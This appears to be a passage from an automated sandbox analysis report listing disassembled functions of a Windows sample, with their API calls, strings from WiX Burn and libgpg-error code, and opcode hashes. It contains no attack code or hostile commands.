                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00D03BB6,00000000,?,00D01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00D013B8), ref: 00D03A20
                                                            • RtlFreeHeap.NTDLL(00000000,?,00D03BB6,00000000,?,00D01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00D013B8,?,00000100), ref: 00D03A27
                                                            • GetLastError.KERNEL32(?,00D03BB6,00000000,?,00D01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00D013B8,?,00000100,?), ref: 00D03A31
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$ErrorFreeLastProcess
                                                            • String ID:
                                                            • API String ID: 406640338-0
                                                            • Opcode ID: 39f1b8ea3fc37054f0f6b72a872acfd55b90f4653200a57bced81af60bd4d7b5
                                                            • Instruction ID: aea02368e4b30470574987a976ed26d04914560b29d9fe61f47d5f95a16e96c2
                                                            • Opcode Fuzzy Hash: 39f1b8ea3fc37054f0f6b72a872acfd55b90f4653200a57bced81af60bd4d7b5
                                                            • Instruction Fuzzy Hash: F7D01277A043395787211BEA5C5CA5B7E5CEF16AB27050122FD48D6360D725CD0096F4
                                                            Function 00D0F755 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D40F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00D6AAA0,00000000,?,00D457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00D40F80
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00D17D59,?,?,?), ref: 00D0F7B9
                                                              • Part of subcall function 00D41026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,00D0F78E,00000000,Installed,00000000,?), ref: 00D4104B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Installed
                                                            • API String ID: 3677997916-3662710971
                                                            • Opcode ID: 6e97b1e04c08af5d77ac5427cdc9554e32af9de4c884e19cbe62ef1843ba017a
                                                            • Instruction ID: f15b52c3b606d49e569c389e4ba06ef1508d97fb421d9d899d0ba91560bd40df
                                                            • Opcode Fuzzy Hash: 6e97b1e04c08af5d77ac5427cdc9554e32af9de4c884e19cbe62ef1843ba017a
                                                            • Instruction Fuzzy Hash: D601A236820218FFCB21DBA4CC46BDEBBB8EF04721F2541A5F804A7150D3759E44D7A1
                                                            Function 00D40F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00D6AAA0,00000000,?,00D457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00D40F80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID: regutil.cpp
                                                            • API String ID: 71445658-955085611
                                                            • Opcode ID: 842bd3f92dfc50e0b3d3b44e295178b96894ff9ddc18237af6ca129238d4ba72
                                                            • Instruction ID: fadf0c1e3c310a8087c2f3f74ebe434de4eef3bf7010dd30d0845b52db02d54e
                                                            • Opcode Fuzzy Hash: 842bd3f92dfc50e0b3d3b44e295178b96894ff9ddc18237af6ca129238d4ba72
                                                            • Instruction Fuzzy Hash: 06F02B336012327B9B3015968C05B6BBE59EF847B0F194135BF8AAE250E671CC04AAF0
                                                            Function 6E23E535 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-399585960
                                                            • Opcode ID: b7ab719594cea48ddbdac7f7ac00b58074d62b4cb8b392b6977a688bab7d9dcd
                                                            • Instruction ID: 2ff649c855b69b1a458c581566aa6454ed8a1c05690c7c0ac9ca56de7f1ad434
                                                            • Opcode Fuzzy Hash: b7ab719594cea48ddbdac7f7ac00b58074d62b4cb8b392b6977a688bab7d9dcd
                                                            • Instruction Fuzzy Hash: 73E01DF19193548FE7524FA49CC475C7B635D71104739C7A3D016C6156E7719D0C8F12
                                                            Function 00D0394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(?,?,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03960
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03967
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess
                                                            • String ID:
                                                            • API String ID: 1357844191-0
                                                            • Opcode ID: 1cb42d7aa8d0cbe6d32e717b91a6e7819015a491974b3f40b5bd4aa72289f08e
                                                            • Instruction ID: d8e1cbc420d7ce84f26e1436634d99513a92a62730283b3d352a425a10a6b655
                                                            • Opcode Fuzzy Hash: 1cb42d7aa8d0cbe6d32e717b91a6e7819015a491974b3f40b5bd4aa72289f08e
                                                            • Instruction Fuzzy Hash: B1C0123619430CAB8B005FF4DC0DC56379CB7256127048401B505C2210C738E0108770
                                                            Function 00D435C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00D435F8
                                                              • Part of subcall function 00D4304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00D43609,00000000,?,00000000), ref: 00D43069
                                                              • Part of subcall function 00D4304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00D2C025,?,00D05405,?,00000000,?), ref: 00D43075
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandleInitLastModuleVariant
                                                            • String ID:
                                                            • API String ID: 52713655-0
                                                            • Opcode ID: 8e97dc6e01c1731ed1515346b3c149a03938b650d8be42dc9f012ab7fcde9f85
                                                            • Instruction ID: 84900c37b13c1e6df30a6c27f5dc0d54744ad270e4bda44e2df1ffd200989df1
                                                            • Opcode Fuzzy Hash: 8e97dc6e01c1731ed1515346b3c149a03938b650d8be42dc9f012ab7fcde9f85
                                                            • Instruction Fuzzy Hash: EE313E76E01229AFCB11DFA9C884ADEB7F8EF08710F06456AED15FB311D6759D008BA4
                                                            Function 00D45870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(80070490,00000000,80070490,00D6AAA0,00000000,80070490,?,?,00D18B19,WiX\Burn,PackageCache,00000000,00D6AAA0,00000000,00000000,80070490), ref: 00D458CA
                                                              • Part of subcall function 00D410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D4112B
                                                              • Part of subcall function 00D410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D41163
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Close
                                                            • String ID:
                                                            • API String ID: 1979452859-0
                                                            • Opcode ID: 89276019c1b73bbffdd8411dc547b410c9d19e5b262cf25d64a80c5f88b1febc
                                                            • Instruction ID: 7faad807f322255aafec1cc3d4f75f0943c0a3900fd73a28fff0599091a26c0a
                                                            • Opcode Fuzzy Hash: 89276019c1b73bbffdd8411dc547b410c9d19e5b262cf25d64a80c5f88b1febc
                                                            • Instruction Fuzzy Hash: 6611C63A800629EFCF226E94E8415AEBB68EF14320B194139FD4167217CB314E50D7F1
                                                            Function 00D034B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00D18BD3,0000001C,80070490,00000000,00000000,80070490), ref: 00D034D5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FolderPath
                                                            • String ID:
                                                            • API String ID: 1514166925-0
                                                            • Opcode ID: fe6b770bffc78d495ef4125451ca22e0f10741ae6262d2b33a2a4a0cc1e56cf3
                                                            • Instruction ID: 17af1694f27c688ed6b5956a66f06efb6c681ea5d6e9ab497283b7c1dbded4e0
                                                            • Opcode Fuzzy Hash: fe6b770bffc78d495ef4125451ca22e0f10741ae6262d2b33a2a4a0cc1e56cf3
                                                            • Instruction Fuzzy Hash: 2FE05B762012247BE7022F719C09EFF7B5CDF163647008051FE48D6150D772E55087B0
                                                            Function 6E23E581 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: ad7587be56bb44abaaa1985e6d3787f0885db1cd0b3a732ed57f358b39a47398
                                                            • Instruction ID: 91305535aabd946f9bbdb014bd7815ebab2cf5e8dec08177f19d802083117e8e
                                                            • Opcode Fuzzy Hash: ad7587be56bb44abaaa1985e6d3787f0885db1cd0b3a732ed57f358b39a47398
                                                            • Instruction Fuzzy Hash: B0C08C4010C3809FC3028FA898946893BB18F22200B1660A3A045C7163D0158E0CCB22
                                                            Function 00D014B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,00D021A8,?,00000000,?,00000000,?,00D0390C,00000000,?,00000104), ref: 00D014E8
                                                              • Part of subcall function 00D03BD3: GetProcessHeap.KERNEL32(00000000,?,?,00D021CC,?,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03BDB
                                                              • Part of subcall function 00D03BD3: HeapSize.KERNEL32(00000000,?,00D021CC,?,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03BE2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$ProcessSizelstrlen
                                                            • String ID:
                                                            • API String ID: 3492610842-0
                                                            • Opcode ID: ec4593930368667de982fd29751db921b651b27959aaff7d282bdbe0e3eee06b
                                                            • Instruction ID: 59b7c2f2eda6deae3ce1d60d3f0720be1c3c7730b6dcacc2a5129d2de30f457e
                                                            • Opcode Fuzzy Hash: ec4593930368667de982fd29751db921b651b27959aaff7d282bdbe0e3eee06b
                                                            • Instruction Fuzzy Hash: 6401F93B600218ABCF119E59DC84F9A77B9EF85764F154219FA1E5B2E1D631DC0086B0

                                                            Non-executed Functions

                                                            Function 6E244630 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: mallocmemsetstrcpystrlen
                                                            • String ID: $$Assertion "%s" in %s failed (%s:%d)
                                                            • API String ID: 2677608751-3889656839
                                                            • Opcode ID: c524623c40f4d6bb6ac37236f013e60c44d3dce1b05137f9d78d0ef71c8a448d
                                                            • Instruction ID: 45c9a58f3f92917e6e8b9d303c98b4767de72e75ac871d8a95cef16817b25772
                                                            • Opcode Fuzzy Hash: c524623c40f4d6bb6ac37236f013e60c44d3dce1b05137f9d78d0ef71c8a448d
                                                            • Instruction Fuzzy Hash: 831115B451930ADFD784AFA9C64075ABBF5AF46304F519C2DE9889B280E7B8C441CB52
                                                            Function 6E234687 Relevance: 73.8, APIs: 39, Strings: 3, Instructions: 283synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CloseHandleLeave$EnterEvent$ObjectSingleWait$DeleteResetfree
                                                            • String ID: ../../libgpg-error-1.43/src/w32-estream.c$nbytes$reader
                                                            • API String ID: 3272993205-3888612630
                                                            • Opcode ID: f76eba3ac157a83a0b668e9b834bf96c4a14234905a1e5131b2eff7762b596ba
                                                            • Instruction ID: 316261f6fa14c9123d8e4262de1671f3b233ff3889982a24c98cd4994c42aa80
                                                            • Opcode Fuzzy Hash: f76eba3ac157a83a0b668e9b834bf96c4a14234905a1e5131b2eff7762b596ba
                                                            • Instruction Fuzzy Hash: 92B117B1504A058FDB40FF78D58852ABBF5FF45300F118A69EC858B259E734E49ACF92
                                                            Function 6E238E00 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92sleepfilestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Create$CloseCountCurrentDirectoryFileHandlePathProcessSleepTempTick_errno_open_osfhandlestrlen
                                                            • String ID: ream
                                                            • API String ID: 2438938358-3784047043
                                                            • Opcode ID: 779c2746930f21810474f4f2e014abe0f4d625c372b15dccdd22545fe95dad94
                                                            • Instruction ID: e091b2a8cf7684d831ac0cb020117f074f0a4f02ec6624e9fb1d5684045ccbfe
                                                            • Opcode Fuzzy Hash: 779c2746930f21810474f4f2e014abe0f4d625c372b15dccdd22545fe95dad94
                                                            • Instruction Fuzzy Hash: F54188B1408B158FD750AF68D88C35ABFF2AB45319F118A2CE8998B2D0D7B5D548CF92
                                                            Function 6E248623 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 195stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: strcmp$isspace
                                                            • String ID: $$ignore-invalid-option
                                                            • API String ID: 3924915934-2086654338
                                                            • Opcode ID: 3520aaf835d62f77364c3c84dbe0339f1fe1919f1fd83dac198bd9e45766a222
                                                            • Instruction ID: 48f11cedf03b281be710b4ae03c83d904401da10eb7f2e9b9a112b8509c71656
                                                            • Opcode Fuzzy Hash: 3520aaf835d62f77364c3c84dbe0339f1fe1919f1fd83dac198bd9e45766a222
                                                            • Instruction Fuzzy Hash: E671AE3561830ACBC75CDFA8D49061EBBE2BF89318F55492CF9A49B355D731D841CB82
                                                            Function 6E249601 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _gpg_w32_gettext
                                                            • String ID: /etc$Note: no default option file '%s'
                                                            • API String ID: 2090770927-1112601484
                                                            • Opcode ID: a951994627ebc87e600ca0a58580f377742cc786cf74422c3ec3353e173f630f
                                                            • Instruction ID: 92311010184360e76535cba58c4d6d187c1e026cb0157e64bea8378062f960c4
                                                            • Opcode Fuzzy Hash: a951994627ebc87e600ca0a58580f377742cc786cf74422c3ec3353e173f630f
                                                            • Instruction Fuzzy Hash: B4B127B460470BCFDB44DFA9C294796BBE6BF45305F168998DC888B346D774E890CB81
                                                            Function 6E23763C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: strlen
                                                            • String ID: errno=%s$%s:%s:%d:
                                                            • API String ID: 39653677-2911015030
                                                            • Opcode ID: e080823d365fdfdb78432afdac78a9063c8a17590c5b5756aa96c3b6c42ff7e4
                                                            • Instruction ID: 29ac4f5ea9a6c5da765b64d1b2f7fed8f1ca780e81cc1317b033982989cca9d9
                                                            • Opcode Fuzzy Hash: e080823d365fdfdb78432afdac78a9063c8a17590c5b5756aa96c3b6c42ff7e4
                                                            • Instruction Fuzzy Hash: E221F9B4909716DFCB80DFA9D59865EBBE6BB46318F308A1EE4C487340D3309881CF52
